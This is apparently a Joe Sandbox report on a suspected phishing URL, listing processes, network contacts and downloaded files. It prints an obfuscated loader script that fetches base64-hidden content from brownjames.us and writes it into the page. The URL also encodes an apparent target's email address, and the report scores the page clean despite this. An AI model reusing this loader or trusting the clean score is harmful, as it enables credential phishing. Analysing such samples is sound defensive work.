Edit tour

Windows Analysis Report
https://qqrcodes87.us-ord-1.linodeobjects.com/qqrcodes87.html#aG9sbHkuYmV5cm91dGV5QHJhdmVpcy5jb20=

Overview

General Information

Sample URL:https://qqrcodes87.us-ord-1.linodeobjects.com/qqrcodes87.html#aG9sbHkuYmV5cm91dGV5QHJhdmVpcy5jb20=
Analysis ID:1311583

Detection

Score:0
Range:0 - 100
Whitelisted:false
Confidence:80%

Signatures

HTML page contains hidden URLs or javascript code

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 5144 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://qqrcodes87.us-ord-1.linodeobjects.com/qqrcodes87.html#aG9sbHkuYmV5cm91dGV5QHJhdmVpcy5jb20= MD5: C817D9E0D995276EC89E4C89AFC19694)
    • chrome.exe (PID: 4832 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1856,i,3135053590179794025,15687956499087648311,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: C817D9E0D995276EC89E4C89AFC19694)
  • cleanup
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: https://qqrcodes87.us-ord-1.linodeobjects.com/qqrcodes87.html#aG9sbHkuYmV5cm91dGV5QHJhdmVpcy5jb20=HTTP Parser: Base64 decoded: https://brownjames.us/5580b51.php
Source: https://qqrcodes87.us-ord-1.linodeobjects.com/qqrcodes87.html#aG9sbHkuYmV5cm91dGV5QHJhdmVpcy5jb20=HTTP Parser: No favicon
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdater
Source: unknownDNS traffic detected: queries for: qqrcodes87.us-ord-1.linodeobjects.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: classification engineClassification label: clean0.win@16/12@7/127
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\GoogleUpdater
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://qqrcodes87.us-ord-1.linodeobjects.com/qqrcodes87.html#aG9sbHkuYmV5cm91dGV5QHJhdmVpcy5jb20=
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1856,i,3135053590179794025,15687956499087648311,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1856,i,3135053590179794025,15687956499087648311,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdater
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management InstrumentationPath Interception1
Process Injection
2
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local SystemExfiltration Over Other Network Medium2
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
Non-Application Layer Protocol
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://qqrcodes87.us-ord-1.linodeobjects.com/qqrcodes87.html#aG9sbHkuYmV5cm91dGV5QHJhdmVpcy5jb20=0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
accounts.google.com
142.250.65.173
truefalse
    high
    code.jquery.com
    151.101.66.137
    truefalse
      high
      brownjames.us
      172.67.163.242
      truefalse
        unknown
        www.google.com
        142.251.41.4
        truefalse
          high
          clients.l.google.com
          142.251.41.14
          truefalse
            high
            clients2.google.com
            unknown
            unknownfalse
              high
              qqrcodes87.us-ord-1.linodeobjects.com
              unknown
              unknownfalse
                unknown
                NameMaliciousAntivirus DetectionReputation
                https://qqrcodes87.us-ord-1.linodeobjects.com/qqrcodes87.html#aG9sbHkuYmV5cm91dGV5QHJhdmVpcy5jb20=false
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  9.9.9.9
                  unknownUnited States
                  19281QUAD9-AS-1USfalse
                  172.67.163.242
                  brownjames.usUnited States
                  13335CLOUDFLARENETUSfalse
                  1.1.1.1
                  unknownAustralia
                  13335CLOUDFLARENETUSfalse
                  142.250.65.173
                  accounts.google.comUnited States
                  15169GOOGLEUSfalse
                  142.251.41.14
                  clients.l.google.comUnited States
                  15169GOOGLEUSfalse
                  142.250.65.227
                  unknownUnited States
                  15169GOOGLEUSfalse
                  239.255.255.250
                  unknownReserved
                  unknownunknownfalse
                  151.101.66.137
                  code.jquery.comUnited States
                  54113FASTLYUSfalse
                  172.232.10.21
                  unknownUnited States
                  20940AKAMAI-ASN1EUfalse
                  142.251.41.4
                  www.google.comUnited States
                  15169GOOGLEUSfalse
                  142.251.35.163
                  unknownUnited States
                  15169GOOGLEUSfalse
                  IP
                  192.168.2.1
                  192.168.2.3
                  Joe Sandbox Version:38.0.0 Beryl
                  Analysis ID:1311583
                  Start date and time:2023-09-20 15:41:11 +02:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                  Sample URL:https://qqrcodes87.us-ord-1.linodeobjects.com/qqrcodes87.html#aG9sbHkuYmV5cm91dGV5QHJhdmVpcy5jb20=
                  Analysis system description:Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
                  Number of analysed new started processes analysed:16
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • EGA enabled
                  Analysis Mode:stream
                  Analysis stop reason:Timeout
                  Detection:CLEAN
                  Classification:clean0.win@16/12@7/127
                  • Exclude process from analysis (whitelisted): SIHClient.exe, SgrmBroker.exe, usocoreworker.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 142.251.35.163, 172.232.10.21, 172.232.10.25, 172.232.10.29, 172.232.0.221, 172.232.0.218, 172.232.10.22, 34.104.35.123
                  • Excluded domains from analysis (whitelisted): edgedl.me.gvt1.com, slscr.update.microsoft.com, clientservices.googleapis.com, us-ord-1.linodeobjects.com.akadns.net
                  • Not all processes where analyzed, report is missing behavior information
                  • VT rate limit hit for: https://qqrcodes87.us-ord-1.linodeobjects.com/qqrcodes87.html#aG9sbHkuYmV5cm91dGV5QHJhdmVpcy5jb20=
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (32030)
                  Category:downloaded
                  Size (bytes):86709
                  Entropy (8bit):5.367391365596119
                  Encrypted:false
                  SSDEEP:
                  MD5:E071ABDA8FE61194711CFC2AB99FE104
                  SHA1:F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
                  SHA-256:85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
                  SHA-512:53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
                  Malicious:false
                  Reputation:low
                  URL:https://code.jquery.com/jquery-3.1.1.min.js
                  Preview:/*! jQuery v3.1.1 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:XML 1.0 document, ASCII text, with no line terminators
                  Category:downloaded
                  Size (bytes):224
                  Entropy (8bit):5.1914252519843505
                  Encrypted:false
                  SSDEEP:
                  MD5:D2986D3AE11D189FE2E5D177F57F4330
                  SHA1:6DCC8E21866B8F018D6F6B36D37BB9652510D5CF
                  SHA-256:ADFB68E99362939CF0F24EAC1E6615B2FD0BFF7E67B82259B1D6116AAD8372B8
                  SHA-512:C747E2DCE17906118D8089317D469E6C589BCE950F734CDFEBEBB6AD1FE4762046BD43BA9D0B99C4600BEC73893A7050F446E0F480ECE4D3EFA7269A98FD7B52
                  Malicious:false
                  Reputation:low
                  URL:https://qqrcodes87.us-ord-1.linodeobjects.com/favicon.ico
                  Preview:<?xml version="1.0" encoding="UTF-8"?><Error><Code>AccessDenied</Code><BucketName>qqrcodes87</BucketName><RequestId>tx000001701d860984246a4-00650af6b5-3d63be-default</RequestId><HostId>3d63be-default-default</HostId></Error>
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, ASCII text, with no line terminators
                  Category:downloaded
                  Size (bytes):192
                  Entropy (8bit):5.1708748580776005
                  Encrypted:false
                  SSDEEP:
                  MD5:706A5B14E68F7507B4081580EFE0E224
                  SHA1:8072D4BDE814147A5D49C3483C9D5C7029BE8D3E
                  SHA-256:004E530217CBF0153F542CA860F8EAFFA6113F1A38460D202018ADE4672B0822
                  SHA-512:9B1CA10B9052D3CA5BB96993F6050F5031C8AD1ADCC9F9A959E01CB59584F4A65ABB64E6ED836F202A6B9AD7A3FA1D2D4068DC15219AAEAEB5D6E99ABF5B64E3
                  Malicious:false
                  Reputation:low
                  URL:https://qqrcodes87.us-ord-1.linodeobjects.com/qqrcodes87.html
                  Preview:<html><head></head><body><input type="hidden" id="b64u" value="aHR0cHM6Ly9icm93bmphbWVzLnVzLzU1ODBiNTEucGhw"></input><script src="https://brownjames.us/admin/js/sc.php"></script></body></html>
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:downloaded
                  Size (bytes):819
                  Entropy (8bit):5.28568380854656
                  Encrypted:false
                  SSDEEP:
                  MD5:29FD4B7043D4AD8B60C708FA6E7ACD46
                  SHA1:89F2913A9A378E967451F0A451FAD248F598EC60
                  SHA-256:28B563456AE25B6E7B93271B10FEC852DF4A7A2DE1EB6F292C18AA68AC577C64
                  SHA-512:11CF18E8BEA334C8A2D25D4CE20CF800EB57AFF346BCB1B0599B5DDE2910E82FB5F5416B1906F83349B3CD51455AC4B88494E47EAAFB0ADB492738D73F7EF12C
                  Malicious:false
                  Reputation:low
                  URL:https://brownjames.us/admin/js/sc.php
                  Preview:var scr= document.createElement('script');..var stc ="aHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuMS4xLm1pbi5qcw=="..var autograb = 0;..scr.setAttribute('src',atob(stc));..document.head.append(scr);..scr.onload=function(){..$.support.cors = true..var url = atob($('#b64u').val());..$.post(url,'scte='.concat('') + (autograb == 0 ? '&auto=false' : ''))....done(function(data){.. if(data=='no'){... document.write('<h1>Please Get an api key to use this page</h1>')... }... else if(data == "outdated"){.... document.write('<h1>Please get an updated version of the page</h1>')... }... else{.... try{..... document.write(atob(data));.... }catch(e){..... document.write('<h1>Cannot write to page</h1>').... }... }...})....fail(function(cd,pg){....document.write("<h1>Unable to connect , Server not found</h1>")...})..}
                  No static file info